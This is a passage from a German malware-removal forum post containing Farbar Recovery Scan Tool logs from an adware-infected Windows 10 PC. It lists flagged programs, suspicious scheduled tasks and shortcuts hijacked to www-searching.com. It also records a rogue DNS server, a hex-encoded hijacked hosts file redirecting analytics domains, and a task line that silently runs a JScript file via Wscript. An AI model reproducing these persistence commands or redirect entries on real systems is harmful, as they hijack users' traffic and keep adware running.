2016-10-08 20:52 - 2016-10-08 20:52 - 1897576 _____ () C:\Users\maikp\AppData\Roaming\Sao-Cof.bin
2016-10-08 20:52 - 2016-10-08 20:52 - 0032038 _____ () C:\Users\maikp\AppData\Roaming\uninstall_temp.ico
2016-10-09 07:48 - 2016-10-12 15:46 - 0440832 _____ () C:\ProgramData\smp2.exe

Dateien, die verschoben oder gelöscht werden sollten:
====================
C:\ProgramData\smp2.exe


Einige Dateien in TEMP:
====================
C:\Users\maikp\AppData\Local\Temp\14759530998e8c0tmp.exe
C:\Users\maikp\AppData\Local\Temp\250C.tmp.exe
C:\Users\maikp\AppData\Local\Temp\331GYZWFPU.exe
C:\Users\maikp\AppData\Local\Temp\5A2CUUZ2WJ.exe
C:\Users\maikp\AppData\Local\Temp\9043.tmp.exe
C:\Users\maikp\AppData\Local\Temp\EHTBCW9NUJ.exe
C:\Users\maikp\AppData\Local\Temp\HY4UTN20J3.exe
C:\Users\maikp\AppData\Local\Temp\ICReinstall_250C.tmp.exe
C:\Users\maikp\AppData\Local\Temp\INW10DC1YD.exe
C:\Users\maikp\AppData\Local\Temp\istB73E.tmp.exe
C:\Users\maikp\AppData\Local\Temp\LKPGWWWXY8.exe
C:\Users\maikp\AppData\Local\Temp\nskE0D6.tmp.exe
C:\Users\maikp\AppData\Local\Temp\nsn6877.tmp.exe
C:\Users\maikp\AppData\Local\Temp\S3RC3RJNY0.exe
C:\Users\maikp\AppData\Local\Temp\sdf82D1.exe
C:\Users\maikp\AppData\Local\Temp\singleProxy.exe
C:\Users\maikp\AppData\Local\Temp\singleProxyUpdater.exe


==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll
[2016-09-30 06:31] - [2016-09-30 06:31] - 0646136 ____A (Microsoft Corporation) EC1F4B814049159FD303B63DDBB35E4B

C:\WINDOWS\SysWOW64\dnsapi.dll
[2016-09-30 06:31] - [2016-09-30 06:31] - 0496872 ____A (Microsoft Corporation) AA2C3100C6622B5B7F5B2603EB9024CA

C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert


LastRegBack: 2016-10-07 14:50

==================== Ende von FRST.txt ============================
und noch die Addition.txt

Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 16-10-2016
durchgeführt von maikp (17-10-2016 13:30:34)
Gestartet von C:\Users\maikp\Downloads
Windows 10 Home Version 1607 (X64) (2016-09-27 10:24:28)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-1190326282-1682839636-2826347982-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1190326282-1682839636-2826347982-503 - Limited - Disabled)
Gast (S-1-5-21-1190326282-1682839636-2826347982-501 - Limited - Disabled)
maikp (S-1-5-21-1190326282-1682839636-2826347982-1002 - Administrator - Enabled) => C:\Users\maikp

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

AMD Catalyst Control Center (HKLM-x32\...\WUCCCApp) (Version: 1.00.0000 - AMD)
AppTrailers - AppTrailers for Desktop (HKLM-x32\...\AppTrailers) (Version: 9.1.10amt - AppTrailers) <==== ACHTUNG
Avira Connect (HKLM-x32\...\{ee247a19-722f-4096-884b-47ec3b7ec396}) (Version: 1.2.73.15322 - Avira Operations GmbH & Co. KG)
Avira Connect (x32 Version: 1.2.73.15322 - Avira Operations GmbH & Co. KG) Hidden
Body Text Feathering (HKLM-x32\...\PopupProduct) (Version: 1.0.0.0 - Body Text Feathering) <==== ACHTUNG
Caster (HKLM\...\{d35e5e88-e5b8-447f-b6f4-66bc7aa638d1}) (Version: 1.0 - Caster) <==== ACHTUNG
CleanBrowser (HKLM-x32\...\CleanBrowser) (Version:  - ) <==== ACHTUNG
DailyBee - DailyBee for Desktop (HKLM-x32\...\DailyBee) (Version: 9.1.10cm - DailyBee)
DPower version 1.0 (HKLM-x32\...\DPower_is1) (Version: 1.0 - WeMonetize) <==== ACHTUNG
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)
Epson Software Updater (HKLM-x32\...\{B4F0E794-11F5-4971-85EC-6D7F2E4DAC68}) (Version: 4.4.3 - SEIKO EPSON CORPORATION)
EPSON XP-530 Series Printer Uninstall (HKLM\...\EPSON XP-530 Series) (Version:  - Seiko Epson Corporation)
EPSON-Handbücher (HKLM-x32\...\{84CECC1B-21EF-41B1-9A91-3E724E5D99D3}) (Version: 1.52.0.0 - SEIKO EPSON CORPORATION)
InterHop (HKLM-x32\...\{A0275D4F-FFAB-4A42-9874-B871B1C4CA3D}) (Version: 1.0.0 - InterHop)
Mozilla Firefox 49.0.1 (x86 de) (HKLM-x32\...\Mozilla Firefox 49.0.1 (x86 de)) (Version: 49.0.1 - Mozilla)
SafeFinder (HKLM-x32\...\{A226FB98-97EE-4616-8CFD-5C14FDEB22AA}) (Version: 1.0.0.0 - Linkury) <==== ACHTUNG
Search module (HKLM-x32\...\Search module) (Version:  - Goobzo) <==== ACHTUNG
shopperz (HKLM-x32\...\{F0422270-2580-43FE-b53A-7F0BA1FB86E9}) (Version: 2.0.0.480 - shopperz) <==== ACHTUNG
Social2Search (HKLM\...\ad11222373fdc03dd874a65a6c6001bc) (Version: 11.12.1.13 (i1.0) - Social2Search) <==== ACHTUNG
SpaceSoundPro (HKLM\...\SpaceSoundPro) (Version: 1.0 - ) <==== ACHTUNG
Traffic Exchange (HKLM-x32\...\{96627CEF-1947-4E94-BA3C-259FF5EAAEF6}) (Version: 1.0.0 - Microleaves)
trotux - Uninstall (HKLM-x32\...\{07218582-B6FD-4D52-B9A8-C7E03FB69770}) (Version:  - ) <==== ACHTUNG
Usenet.nl (HKLM-x32\...\Usenet.nl_is1) (Version:  - )
WebDiscover Browser 2.167.2 (HKLM\...\{fd13f4a2-b0d8-4cad-9ccf-d4128eaf25ff}_is1) (Version: 2.167.2 - WebDiscover Media)
WebShield (HKLM-x32\...\WebShield) (Version:  - )
Y2Go (HKLM-x32\...\Y2Go) (Version:  - Y2Go)
YellowSend (HKLM-x32\...\YSPackage) (Version:  - CMI Limited) <==== ACHTUNG
youndoo - Uninstall (HKLM-x32\...\{CEA17DCC-0602-428D-9596-D1AD64B43EBC}) (Version:  - ) <==== ACHTUNG

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-1190326282-1682839636-2826347982-1002_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\maikp\AppData\Local\Microsoft\OneDrive\17.3.6517.0809_1\FileCoAuth.exe (Microsoft Corporation)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {1855628C-47BF-4CD0-B789-43CA8B7CAF0C} - System32\Tasks\Traffic Exchange Updater => C:\Program Files (x86)\Microleaves\Traffic Exchange\Traffic Exchange Updater.exe [2016-10-06] (Microleaves)
Task: {1EF81F3F-D1F9-40CE-95A6-5531247BBBBE} - System32\Tasks\Y2Go\Updater\Y2GoUpdater => C:\Program Files (x86)\Y2GoUpdater\updater.exe [2016-10-07] ()
Task: {355B39B3-3452-48F0-ACD6-F1932523C419} - System32\Tasks\EPSON XP-530 Series Update {DD8EE1FC-7C54-41C7-B103-390B8B3CF6D0} => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSPME.EXE [2013-11-21] (SEIKO EPSON CORPORATION)
Task: {5BE995DC-CA12-44E6-97D1-FE649B0F938A} - System32\Tasks\SMW_UpdateTask_Time_333836353438353032372d4a5b5b345a417845455a376c => Wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 <==== ACHTUNG
Task: {6FFC60CF-B8DE-4C8D-8A2B-F68074C3ED27} - System32\Tasks\Traffic Exchange => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian.exe [2016-08-17] (Microleaves LTD)
Task: {8126B887-39E4-49BA-8633-9C0685D6E70D} - System32\Tasks\SMW_P => C:\ProgramData\smp2.exe [2016-10-12] () <==== ACHTUNG
Task: {A62A3851-A1C4-4CD5-9978-8C38CA5DA89D} - System32\Tasks\Y2Go\Y2Go\Y2Go => C:\Program Files (x86)\Y2Go\bin\Y2Go.exe [2016-10-07] ()
Task: {A7076610-4363-40B6-ACE9-E968DC802F0C} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\maikp\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe [2016-09-20] (Microsoft Corporation)
Task: {AFBE50C1-1D77-4027-BC73-650D9C696D61} - System32\Tasks\Anezotionprodily Verfier => C:\Program Files (x86)\Memucoojick\coits.exe [2016-10-09] (VideoLAN)
Task: {B4071208-9165-435B-A30D-817D7AEB92DB} - System32\Tasks\WebDiscover Browser Update Task => C:\Program Files\WebDiscoverBrowser\2.167.2\browser.exe [2016-05-27] ()
Task: {BAB458B2-2CD8-4CC2-B8A8-49EFD8FC82EF} - System32\Tasks\WebDiscover Browser Launch Task => C:\Program Files\WebDiscoverBrowser\2.167.2\browser.exe [2016-05-27] ()
Task: {D3B72B85-9FE1-4E54-A6A2-4089A313818B} - System32\Tasks\Traffic Exchange Guardian => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian.exe [2016-08-17] (Microleaves LTD)
Task: {D3D24DB8-113F-4EF0-BB9E-36BA89FB1069} - System32\Tasks\Traffic Exchange Guard => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian.exe [2016-08-17] (Microleaves LTD)
Task: {DC5EADB5-EF38-4526-A30C-9351D9C2576C} - System32\Tasks\Jizergh Launcher => C:\Program Files (x86)\Ferqesp\qegph.exe [2016-10-08] (Glarysoft Ltd)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\EPSON XP-530 Series Update {DD8EE1FC-7C54-41C7-B103-390B8B3CF6D0}.job => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSPME.EXE:/EXE:{DD8EE1FC-7C54-41C7-B103-390B8B3CF6D0} /F:UpdateWORKGROUP\DESKTOP-CHK5R9U$
Searches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

ShortcutWithArgument: C:\Users\maikp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epf&s=ga9zftptn095001au,ff9750b9-f837-4047-8c09-0146ff18dda0,
ShortcutWithArgument: C:\Users\maikp\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> "microsoft-edge:hxxp://www%2dsearching.com/?prd=set_epe&s=GA9zftptn095001AU,ff9750b9-f837-4047-8c09-0146ff18dda0,"
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www-searching.com/?prd=set_epf&s=ga9zftptn095001au,ff9750b9-f837-4047-8c09-0146ff18dda0,
ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www-searching.com/?prd=set_epf&s=ga9zftptn095001au,ff9750b9-f837-4047-8c09-0146ff18dda0,

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2016-10-08 20:59 - 2016-10-17 13:13 - 00625272 _____ () C:\Windows\System32\NetUtils2016.dll
2016-07-16 13:42 - 2016-07-16 13:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-09-30 06:31 - 2016-09-15 19:25 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-10-06 18:50 - 2016-10-06 18:50 - 18874368 _____ () C:\Program Files\ad11222373fdc03dd874a65a6c6001bc\a080856dd34136605cca635f3f51b1dc.exe
2016-10-08 20:52 - 2016-10-08 20:51 - 00693760 _____ () C:\ProgramData\Quoteex\Quoteex.exe
2016-05-19 16:41 - 2016-05-19 16:41 - 00134656 _____ () C:\Users\maikp\AppData\Local\Apps\2.0\abril.exe
2016-10-08 20:59 - 2016-10-08 20:59 - 00470592 _____ () C:\WINDOWS\SysWoW64\NetUtils2016.exe
2016-09-26 09:00 - 2016-09-28 10:08 - 00057856 _____ () C:\ProgramData\NetworkPacketManitor\Nettrans.exe
2016-10-14 17:53 - 2016-10-14 04:25 - 00693976 _____ () C:\Program Files (x86)\WinSaber\WinSaber.exe
2016-10-08 20:52 - 2016-10-07 19:08 - 03786752 _____ () C:\ProgramData\Logic Handler\set.exe
2016-08-11 15:04 - 2016-08-11 15:04 - 00170496 _____ () C:\Users\maikp\AppData\Roaming\Geunfy\Geunfy.exe
2016-10-08 20:55 - 2016-10-08 20:55 - 00445952 _____ () C:\Program Files (x86)\03AA02FC-1475952944-05C3-7606-B70700080009\knsuD3B.tmpfs
2016-08-12 21:23 - 2016-10-14 18:54 - 00360448 _____ () C:\Program Files (x86)\WebShield\WebShield.exe
2016-10-14 17:54 - 2016-10-09 10:57 - 00159232 _____ () C:\Program Files (x86)\InterHop\InterHop.exe
2016-10-08 20:57 - 2016-05-27 11:41 - 00985312 _____ () C:\Program Files\WebDiscoverBrowser\2.167.2\browser.exe
2016-08-11 15:04 - 2016-08-11 15:04 - 00668672 _____ () C:\Users\maikp\AppData\Roaming\Geunfy\Yjetipudl.dll
2016-10-07 09:18 - 2016-10-07 09:18 - 02329584 _____ () C:\Program Files (x86)\Y2Go\bin\Y2Go.exe
2016-09-30 06:31 - 2016-09-15 19:25 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-09-27 15:30 - 2016-09-27 15:30 - 01864384 _____ () C:\Users\maikp\AppData\Local\Microsoft\OneDrive\17.3.6517.0809_1\amd64\ClientTelemetry.dll
2016-08-11 15:04 - 2016-08-11 15:04 - 00112128 _____ () C:\Users\maikp\AppData\Roaming\Geunfy\Yurejjaeb.exe
2016-08-11 15:04 - 2016-08-11 15:04 - 00143872 _____ () C:\Users\maikp\AppData\Roaming\Geunfy\Yjetipudl.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2016-09-30 06:31 - 2016-09-15 18:24 - 09760256 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-09-30 06:31 - 2016-09-15 18:18 - 01401344 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-09-30 06:31 - 2016-09-15 18:17 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2016-09-30 06:31 - 2016-09-15 18:18 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2016-09-30 06:31 - 2016-09-15 18:18 - 02424832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-09-30 06:31 - 2016-09-15 18:20 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-07-02 17:12 - 2015-07-02 17:12 - 01927680 _____ () C:\Program Files\SpaceSoundPro\SpaceSoundPro.dll
2016-10-08 20:59 - 2016-10-08 20:59 - 04284416 _____ () C:\Program Files (x86)\mpck\wincom_VL5.exe
2016-09-29 09:07 - 2016-09-29 09:07 - 47824832 _____ () C:\Users\maikp\AppData\Roaming\AppTrailers\AppTrailers.exe
2015-11-04 16:43 - 2015-11-04 16:43 - 00102400 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Proxy.Native.dll
2016-09-29 09:02 - 2016-09-29 09:02 - 47813592 _____ () C:\Users\maikp\AppData\Roaming\DailyBee\DailyBee.exe
2016-10-07 09:17 - 2016-10-07 09:17 - 00287216 _____ () C:\Program Files (x86)\Y2Go\bin\pt.exe
2016-10-07 09:16 - 2016-10-07 09:16 - 00340976 _____ () C:\Program Files (x86)\Y2Go\bin\UrlHandler.exe
2016-09-28 16:35 - 2016-09-28 16:36 - 00072192 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2016-09-28 16:35 - 2016-09-28 16:36 - 00178176 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2016-09-28 16:35 - 2016-09-28 16:36 - 35250688 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2016-10-08 20:58 - 2016-10-08 20:58 - 00277504 _____ () c:\program files (x86)\ferqesp\cletaspwsemnt.dll
2016-10-08 20:57 - 2016-05-27 11:36 - 00117248 _____ () C:\Program Files\WebDiscoverBrowser\2.167.2\48.0.2564.10\chrome_elf.dll
2016-08-11 15:04 - 2016-08-11 15:04 - 00258560 _____ () C:\Users\maikp\AppData\Roaming\Geunfy\Yurejjaeb.dll
2016-09-27 15:30 - 2016-09-27 15:30 - 01383616 _____ () C:\Users\maikp\AppData\Local\Microsoft\OneDrive\17.3.6517.0809_1\ClientTelemetry.dll
2016-09-27 15:30 - 2016-09-27 15:30 - 00118976 _____ () C:\Users\maikp\AppData\Local\Microsoft\OneDrive\17.3.6517.0809_1\FileSyncViews.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\bsdpf64.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\bsdpr64.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\bsdpf64.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\bsdpr64.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\zdwfp => ""="Driver"

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2016-09-17 18:55 - 2016-10-09 08:02 - 00001808 ____A C:\WINDOWS\system32\Drivers\etc\hosts

0x3130372E3137382E3235352E3838207777772E676F6F676C652D616E616C79746963732E636F6D0D0A3130372E3137382E3235352E3838207777772E73746174636F756E7465722E636F6D0D0A3130372E3137382E3235352E38382073746174636F756E7465722E636F6D0D0A3130372E3137382E3235352E38382073736C2E676F6F676C652D616E616C79746963732E636F6D0D0A3130372E3137382E3235352E383820706172746E65722E676F6F676C65616473657276696365732E636F6D0D0A3130372E3137382E3235352E383820676F6F676C652D616E616C79746963732E636F6D0D0A3130372E3137382E3234382E313330207374617469632E646F75626C65636C69636B2E6E65740D0A3130372E3137382E3234372E31333020636F6E6E6563742E66616365626F6F6B2E6E65740D0A3130372E3137382E3235352E3838207777772E676F6F676C652D616E616C79746963732E636F6D0D0A3130372E3137382E3235352E3838207777772E73746174636F756E7465722E636F6D0D0A3130372E3137382E3235352E38382073746174636F756E7465722E636F6D0D0A3130372E3137382E3235352E38382073736C2E676F6F676C652D616E616C79746963732E636F6D0D0A3130372E3137382E3235352E383820706172746E65722E676F6F676C65616473657276696365732E636F6D0D0A3130372E3137382E3235352E383820676F6F676C652D616E616C79746963732E636F6D0D0A3130372E3137382E3234382E313330207374617469632E646F75626C65636C69636B2E6E65740D0A3130372E3137382E3234372E31333020636F6E6E6563742E66616365626F6F6B2E6E65740D0A2320436F707972696768742028632920313939332D32303039204D6963726F736F667420436F72702E0D0A230D0A23205468697320697320612073616D706C6520484F5354532066696C652075736564206279204D6963726F736F6674205443502F495020666F722057696E646F77732E0D0A230D0A2320546869732066696C6520636F6E7461696E7320746865206D617070696E6773206F662049502061646472657373657320746F20686F7374206E616D65732E20456163680D0A2320656E7472792073686F756C64206265206B657074206F6E20616E20696E646976696475616C206C696E652E2054686520495020616464726573732073686F756C640D0A2320626520706C6163656420696E2074686520666972737420636F6C756D6E20666F6C6C6F7765642062792074686520636F72726573706F6E64696E6720686F7374206E616D652E0D0A2320546865204950206164647265737320616E642074686520686F7374206E616D652073686F756C6420626520736570617261746564206279206174206C65617374206F6E650D0A232073706163652E0D0A230D0A23204164646974696F6E616C6C792C20636F6D6D656E747320287375636820617320746865736529206D617920626520696E736572746564206F6E20696E646976696475616C0D0A23206C696E6573206F7220666F6C6C6F77696E6720746865206D616368696E65206E616D652064656E6F7465642062792061202723272073796D626F6C2E0D0A230D0A2320466F72206578616D706C653A0D0A230D0A232020202020203130322E35342E39342E393720202020207268696E6F2E61636D652E636F6D202020202020202020202320736F75726365207365727665720D0A232020202020202033382E32352E36332E31302020202020782E61636D652E636F6D202020202020202020202020202023207820636C69656E7420686F73740D0A0D0A23206C6F63616C686F7374206E616D65207265736F6C7574696F6E2069732068616E646C65642077697468696E20444E5320697473656C662E0D0A23093132372E302E302E31202020202020206C6F63616C686F73740D0A23093A3A31202020202020202020202020206C6F63616C686F73740D0A0D0A3132372E302E302E3120202020202020646F776E2E6261696475323031362E636F6D0D0A0D0A3132372E302E302E31202020202020203132332E736F676F752E636F6D0D0A0D0A3132372E302E302E31202020202020207777772E637A7A73797A676D2E636F6D0D0A0D0A3132372E302E302E31202020202020207777772E637A7A73797A786C2E636F6D0D0A0D0A3132372E302E302E3120202020202020756E696F6E2E6261696475323031392E636F6D0D0A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\maikp\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\unbenannt.png
DNS Servers: 188.120.239.115 - 8.8.8.8
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==


==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{2EA584C8-BECC-4A4C-AF33-4E606E73CDAE}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{436571FA-8515-4E9E-AAD9-2CC79F8602B9}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{72C356B8-CB26-4DEC-BB66-1AD93604839B}] => (Allow) C:\Program Files (x86)\Y2Go\bin\Y2Go.exe
FirewallRules: [{530DE27F-6C7A-4697-9DB1-0BB50A971DAA}] => (Allow) C:\Program Files (x86)\Y2Go\bin\Y2Go.exe
FirewallRules: [{B955008F-C21E-4141-A531-9F2BEA4B6C5C}] => (Allow) C:\Users\maikp\AppData\Local\Temp\is-1Q78S.tmp\download\MiniThunderPlatform.exe

==================== Wiederherstellungspunkte =========================

14-10-2016 17:55:01 Removed Minecraft

==================== Fehlerhafte Geräte im Gerätemanager =============


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (10/17/2016 01:23:04 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: DESKTOP-CHK5R9U)
Description: Das Paket „Microsoft.MicrosoftEdge_38.14393.0.0_neutral__8wekyb3d8bbwe+MicrosoftEdge“ wurde beendet, da das Anhalten zu lange dauerte.

Error: (10/17/2016 01:22:23 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm MicrosoftEdgeCP.exe, Version 11.0.14393.82 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 171c

Startzeit: 01d2286858754d2b

Beendigungszeit: 225

Anwendungspfad: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

Berichts-ID: f1cf2be1-945b-11e6-b084-fcaa14c376b7

Vollständiger Name des fehlerhaften Pakets: Microsoft.MicrosoftEdge_38.14393.0.0_neutral__8wekyb3d8bbwe

Auf das fehlerhafte Paket bezogene Anwendungs-ID: MicrosoftEdge

Error: (10/17/2016 01:22:17 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: DESKTOP-CHK5R9U)
Description: Das Paket „Microsoft.MicrosoftEdge_38.14393.0.0_neutral__8wekyb3d8bbwe+MicrosoftEdge#{863e442b-6f52-4356-82e0-5859d3714310}“ wurde beendet, da das Anhalten zu lange dauerte.

Error: (10/17/2016 01:14:36 PM) (Source: Perflib) (EventID: 1023) (User: )
Description: Die erweiterbare Leistungsindikator-DLL rdyboost kann nicht geladen werden. Die ersten vier Bytes (DWORD) des Datenbereichs enthalten den Windows-Fehlercode.

Error: (10/17/2016 01:14:32 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: Die Open-Prozedur für den Dienst "BITS" in der DLL "C:\Windows\System32\bitsperf.dll" war nicht erfolgreich. Die Leistungsdaten für diesen Dienst sind nicht verfügbar. Die ersten vier Bytes (DWORD) des Datenbereichs enthalten den Fehlercode.

Error: (10/17/2016 01:13:05 PM) (Source: Windows Search Service) (EventID: 3104) (User: )
Description: Fehler beim Aufzählen von Benutzersitzungen zum Generieren von Filterpools.

Details:
        (HRESULT : 0x80040210) (0x80040210)

Error: (10/17/2016 01:13:05 PM) (Source: Windows Search Service) (EventID: 3104) (User: )
Description: Fehler beim Aufzählen von Benutzersitzungen zum Generieren von Filterpools.

Details:
        (HRESULT : 0x80040210) (0x80040210)

Error: (10/17/2016 01:13:03 PM) (Source: Windows Search Service) (EventID: 3104) (User: )
Description: Fehler beim Aufzählen von Benutzersitzungen zum Generieren von Filterpools.

Details:
        (HRESULT : 0x80040210) (0x80040210)

Error: (10/17/2016 01:12:58 PM) (Source: Windows Search Service) (EventID: 3104) (User: )
Description: Fehler beim Aufzählen von Benutzersitzungen zum Generieren von Filterpools.

Details:
        (HRESULT : 0x80040210) (0x80040210)

Error: (10/17/2016 01:12:58 PM) (Source: Windows Search Service) (EventID: 3104) (User: )
Description: Fehler beim Aufzählen von Benutzersitzungen zum Generieren von Filterpools.

Details:
        (HRESULT : 0x80040210) (0x80040210)


Systemfehler:
=============
